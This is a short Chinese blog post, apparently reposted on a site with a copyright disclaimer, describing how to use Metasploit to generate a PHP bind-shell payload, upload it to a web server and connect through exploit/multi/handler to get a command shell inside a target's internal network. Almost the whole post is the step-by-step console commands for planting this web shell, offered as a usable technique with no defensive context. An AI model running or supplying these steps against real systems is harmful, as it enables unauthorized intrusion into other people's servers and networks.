php结合msf反弹内网shell


感谢:

perl6大佬分享的姿势。

MSF:

msf > use payload/php/bind_php
msf exploit(handler) > set PAYLOAD payload/php/bind_php
msf exploit(handler) > set RHOST 目标内网ip
msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就会在f盘生成xishaonian.php脚本一般都是需要修改一下,没有php标签就加个php标签之类的。

然后将xishaonian.php传到web上。
然后再次运行msf

use payload/php/bind_php
msf payload(bind_php) > set RHOST 目标外网ip
msf payload(bind_php) > use exploit/multi/handler
msf exploit(handler) > set payload php/bind_php
msf exploit(handler) > run

访问web上的xishaonian.php,就可以反弹到cmdshell了。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM